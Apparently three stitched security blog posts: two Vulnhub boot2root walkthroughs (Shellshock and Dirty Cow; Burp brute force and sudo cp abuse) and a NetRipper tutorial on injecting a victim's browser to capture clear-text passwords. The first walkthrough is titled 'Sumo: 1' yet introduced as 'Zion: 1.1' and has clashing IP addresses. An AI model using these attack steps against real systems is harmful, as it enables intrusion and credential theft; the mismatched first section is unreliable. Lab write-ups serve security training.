Sumo: 1 Vulnhub Walkthrough

Today, I am going to share a writeup for the boot2root challenge of the Vulnhub machine “Zion: 1.1”. It was an intermediate box based on the Linux machine. The goal for this machine is to read the flag file

Penetration Testing Methodology

·         Network Scanning

o   Netdiscover scan

o   Nmap Scan

·         Enumeration

o   Enumerating HTTP service on Browser

o   Enumerating using Nikto

·         Exploitation

o   Exploiting Shellshock Vulnerability

o   Gaining Meterpreter

·         Post Exploitation

o   Enumerating for Escalating Privileges

·         Privilege Escalation

o   Dirty Cow

·         Reading Root Flag

Walkthrough

Network Scanning

We begin by scanning our network for the target machine using Netdiscover. The target machine is active on 192.168.1.109.

netdiscover

Let’s scan it and see which services are running and which ports are open.

nmap -p- -A 192.168.1.104

Enumeration

The scan gives us a lot of good and useful information, but what stands out the most is that port 22 and 80 are open, let’s explore port 80 first and see what we can find there.

This webpage seemed like a dead-end so, we decided to perform a Nikto scan in the hope that it will provide us some more insight.

nikto -h http://192.168.1.104

The Nikto scans the web application to find the /cgi-bin/ directory. It further inspects it to find that the application is vulnerable to Shellshock Vulnerability. Time to exploit it.

Exploitation

Open a terminal type msfconsole for loading Metasploit framework and use following module. This module targets CGI scripts in the Apache web server by setting the HTTP_USER_AGENT environment variable to a malicious function definition.

use exploit/multi/http/apache_mod_cgi_bash_env_exec

msf exploit(apache_mod_cgi_bash_env_exec) >set rhost 192.168.1.104

msf exploit(apache_mod_cgi_bash_env_exec) >set lhost 192.168.1.112

msf exploit(apache_mod_cgi_bash_env_exec) >set targeturi /cgi-bin/test

msf exploit(apache_mod_cgi_bash_env_exec) >expoit

We ran the sysinfo command to find that the Operating System of the Machine is Ubuntu 12.04. Operating Systems this old have a vulnerable kernel. We should try DIRTYCOW.

Privilege Escalation

I downloaded the exploit inside the host machine and then compiled it before running the exploit, so I ran the following commands.

gcc -pthread c0w.c -o c0w

Next, we upload that compiled file in the remote shell for getting into the root.

cd /tmp

upload /root/c0w .

./c0w

The shell that was generated has elevated privileges. To read the Root Flag, we will first convert this shell into a proper shell. Then we used the files created by the Dirty Cow exploit we log in as root. We can see that we have the root flag.

shell

python -c 'import pty; pty.spawn("/bin/sh")

./c0w

/usr/bin/passwd

cd /root

cat root.txt

Here we got our root flag. So that’s for now. See you next time.

Zion: 1.1 Vulnhub Walkthrough

Today, I am going to share a writeup for the boot2root challenge of the Vulnhub machine “Zion: 1.1”. It was actually an intermediate box based on the Linux machine. The goal for this machine is to read the flag.txt file.

Penetration Testing Methodology

·         Network Scanning

o   Netdiscover scan

o   Nmap Scan

·         Enumeration

o   Enumerating HTTP service on Browser

o   Inspecting the Login Panel using BurpSuite

o   Decoding Base64 and Base62 messages

·         Exploitation

o   Crafting the Dictionary using Cewl

o   Bruteforcing using BurpSuite

o   Enumerating the Web Application

·         Post Exploitation

o   Connecting using SSH

o   Enumerating for Sudo Rights

·         Privilege Escalation

o   Abusing Sudo Rights on cp

Walkthrough

Network Scanning

We begin by scanning our network for the target machine using Netdiscover. The target machine is active on 192.168.1.109. Let’s scan it and see which services are running and which ports are open.

We do an aggressive scan on the target using nmap.

nmap -p- -A 192.168.1.109

Enumeration

The scan gives us a lot of good and useful information, but what stands out the most is that port 22 and 80 are open, let’s explore port 80 first and see what we can find there.

Here we see that we have 2 buttons, The “Truth” and “Illusion”. We are given the choice for the Red Pill and Blue Pill similar situation as Neo faced in the Matrix Trilogy by Morpheus. Clicking on the Truth button, we get to a login page.

After looking around the login panel for some time, I decided to inspect the panel through the BurpSuite. I captured the request in the BurpSuite. Sent the request to the Repeater. Here, upon checking the response of the request, we see that there  are some odd parameters containing values that seem to be encrypted.

Guessing that the encryption might be Base64, I decided to decode the banner value using the Decoder. This gave us a message that tells us to “Open our mind”. Also it tells us to avoid some characters.

This means that the message that was left to us is not exactly Base64. If we avoid the characters mentioned in the message we get the encryption that is Base62. So, let’s try to decrypt the message using a Base62 decrypter. You can find one online.

The message that was decoded was that it is giving us the hints for the credentials for the “Zion’s Systems”. It tells us to look at the choice page that we were on few moments before. Also it gives us the username for the user “morpheus.thematrix”. It also tells us that the user likes to keep simple passwords.

Exploitation

There are multiple methods as to how we can try to get the passwords. We can try manually but when we have an arsenal of tools that can do this for us why waste the time. I decided to create a dictionary that can be used to bruteforce the login using cewl. Using cewl is quite simple, we need to provide the URL and the output file path. Cewl will run and create a dictionary for  all the words that are on the webpage.

cewl http://192.168.1.109/ -w dict.txt

Now for the brute force, we decide to use the BurpSuite’s Intruder Module. To use Intruder, we need capture the request at the “Login” button with some sample text inside the password box.

Now that we have the request, we can use it to brute force the login using the Intruder. I gave the sample text as “test”. We can send the request to Intruder using the shortcut “Ctrl + I”.

After sending the request to Intruder, we go to the Positions Tab. Here we select the Attack type as Sniper. After setting the Attack type we need to specify the Payload Positions. This is the particular text that is going to be brute forced. Here we want to brute force the password parameter. So we select the “test” as place holder. Add the “§” symbol around the text as shown in the image given below by clicking the “Add §” button.

Next, we moved onto the Payloads Tab. Here we have multiple sections to provide the type of payload we want to provide for the bruteforce. Payload here means the dictionary that we created using Cewl previously. We need to provide the Simple list in the Payload type option under the Payload Sets section. Next, we need to add the contents of the dictionary we created. For this we will use the Load button in the Payload Options section. This will open up a window where we can browse the dictionary we created. After doing the above steps we click on the Start attack button.

Clicking on the Start attack button opens up a yet other windows where we can see the Burp Suite try multiple requests from the dictionary. We see that we get a redirection from the password interpreted. This could mean that this is the password. Time to check it out.

We go back to the Login Panel, and try the following credentials to login.

Username: morpheus.thematrix

Password: interpreted

This opens up the Zion’s System. Here we see some information about the user w.rabbit . It tells that the user w.rabbit has forgotten his password. So, the Administrator has disabled its logins using the password. But he did something related to the movies. Matrix, I suppose. Also, I see that there is a link for Private key in the top right sections as shown in the image given below.

The link leads us to a page called rabbit-hole/rsa_priv_key_for_w.rabbit.txt. This is a private key for the user w.rabbit. This means we can login into SSH using this user.

Post Exploitation

I copied the contents of the key and saved it into a empty file and save it as “key”. Now, since we have the port 22 open on the Target Machine, we will try to login on SSH using this key.  From some enumeration we find the warning.txt file. Here we see that we have to find the flag in the path mentioned. We are given the freedom to choose any method or technique we want. Enumerating further into the mail directory, I found the credentials for the user w.rabbit. We are already logged in as w.rabbit user but with the password we can run process as user w.rabbit. To find out what services we can run with elevated permissions. We can see that cp command can be run with elevated privileges as user dozer.

ssh -i key w.rabbit@192.168.1.109

cat warning.txt

cat w.rabbit.txt

sudo -l

This means that we can run the cp command without any password or other verification.

Privilege Escalation

In the above step we got the that we can access /bin/cp as sudo for both w.rabbit and dozer and in the process of enumeration we got the sudo password for the w.rabbit. So, let’s try to use the /bin/cp file to escalate to the dozer using /bin/sudo. Using cp i.e copy command we will copy the flag.txt in the tmp folder to display the flag.txt using below command.

/bin/sudo -u dozer /bin/cp --no-preserve=mode,ownership /home/dozer/flag.txt /tmp/flag.txt

cat flag.txt

Here we got our /home/dozer/flag.txt. So that’s for now. See you next time.

Dumping Clear-Text Passwords from Browsers using NetRipper

Dumping Clear-Text Passwords from Browsers using NetRipper

NetRipper is a post-exploitation tool and performs API based traffic sniffing to capture plain text passwords before it is passed to encryption. It supports PuTTY, WinSCP, Lync, Outlook, Google Chrome, Mozilla Firefox, and more. This tool is written by PowerShell, C, and C++. It was developed by Ionut Popescu.

Table of Content

·         Working

·         Installation

·         Injecting the Process

·         Collecting the Credentials

·         Reading the Credentials

Working

The working of NetRipper is quite simple if you take a look at the flowchart below. We have a DLL file that comes with the NetRipper, when we target a particular process running on the Target System, the DLL file injects itself into the process. Then it hooks itself to the API that is being communicated to that particular process.

In the case of Web Browser, suppose the victim is browsing a particular Web Service. He/she enters their credentials in a form created on the Web Page. The data on this form is supposed to be encrypted and carried to the Host Server with the help of a Web Service or API. The NetRipper hooks to that particular API and reads the credentials that are was carrying and then stores the data back into the Victim’s system.

Installation

The Installation of the NetRipper is very simple. If you want to build the binary from scratch then check the release notes for info. Now to being, I cloned the entire git to my attacker machine.

git clone http://github.com/NytroRST/NetRipper.git

After cloning we traverse inside the directory using the cd command. Now we need to run a series of commands so that we can access the NetRipper from the Metasploit Framework. These are the basic copy commands that copy the NetRipper Ruby files inside the default Metasploit Directory. We also transfer the hooking agents used by the NetRipper. These commands are also available on the official GitHub page of NetRipper.

mkdir /usr/share/metasploit-framework/modules/post/windows/gather/netripper

cp Metasploit/netripper.rb /usr/share/metasploit-framework/modules/post/windows/gather/netripper/netripper.rb

cp x86/DLL.x86.dll /usr/share/metasploit-framework/modules/post/windows/gather/netripper/DLL.x86.dll

cp x64/DLL.x64.dll /usr/share/metasploit-framework/modules/post/windows/gather/netripper/DLL.x64.dll

Since we added modules into the Metasploit Framework, to load those, we need to run reload_all command in the Metasploit shell as shown in the image given below.

Injecting the Process

First, we need a target to perform the attack on. Here in the practical I used a Windows 10 device in the same network. Since the NetRipper is a post-exploitation tool. We need to exploit the machine first. For this we used the MSFvenom to craft an x64 payload executable file for the target machine then we ran a listener in the Metasploit with configurations that were used for the crafting payload. Then we get the user to execute the payload using some tactics such as Social Engineering etc. This gives us a meterpreter session as shown in the image given below.

NOTE: In case, there are issues with the NetRipper first elevate the privileges on the Target Machine to gain the NT System. This is purely optional. NetRipper is supposed to work without it but I faced some difficulties with it, so I used the elevated shell.

After getting the meterpreter session, its time to load the NetRipper Payload with the help of use keywords. We need to provide the process that NetRipper will use to capture the passwords. According to the Official GitHub, NetRipper can extract the password from Chrome, Firefox, and other famous browsers and other utility tools such as PuTTY. First let’s take a look at the Firefox.

After running the payload, the clueless victim browses any website and enter his/her credentials unknowingly that NetRipper is on the watch the credentials just before they are encrypted and sent to the Server. In the above screenshots we see that NetRipper is injecting its process into the Firefox process.

Collecting the Credentials

When the authentications are done the captured credentials are stored in C:\Users\[Username]\AppData\Local\Temp\NetRipper. So, we traverse to this location and see that there are multiple files including the pcap files and text files. We download the StringFinder.txt file to our attacker machine.

Reading the Credentials

Now that we have downloaded the Kali Linux, we can use the cat command. Here we can see that the victim browsed Twitter using Firefox with the credentials “yashika123” and “123456789”.

This is the demonstration of NetRipper on Mozilla Firefox. I used the latest version that was available at the time.

NetRipper supports a lot of other browsers and utility tools such as Google Chrome, Brave, Opera, PuTTY, etc, the process for all them is pretty the same as this one. All we need to do is change the processname and we are good to go.

NOTE: This is not a 100% guaranteed method as sometimes other factors play a significant role to prevent the NetRipper from capturing the passwords. I tried multiple times with multiple websites and credentials. There were times when I was not able to gather the credentials. So, this is not full-proof but It is a useful tool none the less.